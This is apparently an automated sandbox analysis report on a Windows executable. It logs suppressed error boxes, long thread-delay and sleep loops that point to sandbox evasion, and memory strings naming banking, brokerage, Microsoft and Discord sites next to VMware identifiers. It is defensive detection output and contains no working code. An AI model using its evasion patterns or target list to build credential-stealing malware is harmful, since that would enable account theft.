Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe	Memory allocated: 2140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Memory allocated: 25F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Memory allocated: 23D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe

0_2_004019F0

Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598763	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595841	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595504	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 594468	Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe	Window / User API: threadDelayed 8120			Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Window / User API: threadDelayed 1733			Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 3772	Thread sleep count: 8120 > 30	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 3772	Thread sleep count: 1733 > 30	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -599421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -598763s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -595841s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -595504s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -595266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe TID: 7092	Thread sleep time: -594468s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598763	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595841	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595504	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Thread delayed: delay time: 594468	Jump to behavior

Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
